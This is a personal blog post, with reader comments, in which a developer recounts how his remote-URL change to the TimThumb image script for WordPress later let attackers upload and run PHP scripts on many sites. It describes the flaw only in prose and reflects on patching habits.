That Time I Brought Down Millions of WordPress Sites

I’m going to take you guys back to a time when I was doing some client work.

I was at the time working on becoming a somebody in the WP Dev community. I attached myself to a really awesome designer George Wiscombe, and started working on a theme he designed called Handgloves. I began by widgetizing it (which was just starting to catch on — that probably dates me a little) then added a couple of built in social media hooks. I emailed him and told him I was working on it, and he released my changes, and because he is an AWESOME dude, gave me a byline on it.

We (Humankind) had a client that wanted a WordPress Multi-User (yep, before multi-site — dating myself yet again) installation for their interior design network, with an asset catalog that lived under the main root, but all the designers’ sites as sub-domains. We ran into a little problem, Handgloves used TimThumb, and TimThumb’s wordpress implementation at the time had a small problem. It was hard-coded to use only the local uploads folder by prepending the website URL to the uploads directory, then appending the image name.

I decided to do a quick fix for this, and post it up on my old personal blog. I allowed you to pass either the image name or a full URL with schema. If a full URL was passed, it would download the image locally into your uploads folder.

Problem Solved! (Or So I thought)

I posted my change up to Binary Moon, linking back to my personal blog, with a small caveat – “I haven’t tested this, and there are probably gaping holes in it.”

Within a week, my blog was seeing a few hundred hits per day all for TimThumb, and that was awesome. I think my change was eventually merged into the main TimThumb library, since my traffic died down after a few months (I don’t know that for a fact).

The client had eventually decided that in order to preserve backlink juice, the site shouldn’t have sub-domains, but live under sub-folders, and I forgot about TimThumb for the time being.

Many Months (or a Year?) Later

That gaping hole that I warned might be in my super shitty code… Well, there it was. Millions of sites had been affected.

The exploit used my cross-domain TimThumb (which had already been patched by that time, but who actually downloads new versions of PHP scripts?) to download php scripts from other websites and thanks to my addition to the code, would store them locally in the uploads directory.

So a hacker would find a website using TimThumb, then make the request to grab their remote PHP script. Once TimThumb downloaded and stored the script, the hacker would then execute their PHP script and would then own the site. Having an up-to-date WordPress, TimThumb or basic permission settings on the uploads folder would have prevented every one of the attacks, but that is the nature of the internet. No one ever patches their servers, and random people who download a script, never sign up for notifications of new versions or anything.

Many millions of websites were effected by this, and once Google found the exploit, they started blocking most sites that could be hijacked like this from search results and from the Chrome browser.

And that was how I brought down millions of websites.

Have you ever had such a negative impact on such a large scale before? Leave a comment!

18 thoughts on “That Time I Brought Down Millions of WordPress Sites”

  1. Happened to me at 2001, with the world’s first social network (~7 years before the term “social network” came to life). Learned from it, never happened again.

  2. I remember having problems with three websites at the time due to TimThumb implemented in one theme. Ha! This gave me a lot of headaches for some days!

  3. OpenX, the ad serving platform had a known exploit (5+ years ago) that allowed uploading of arbitrary scripts. The script that was generally uploaded was a big sophisticated one. It allowed control over most of the site processes and adserving, allowing the serving of malicious software as advert content.

    1. Why did it take so long to get fixed? I would expect an exploit at the service level like that should have been patched within a few hours of it being known. Unless it required a fundamental rethinking of how it serves ads (manual review, etc).

  4. Oh man, nice to meet the person who kept me up for nights fixing my clients websites. Since then, I have made changes to the way I work and I have to thank you for that… 🙂

Leave a Reply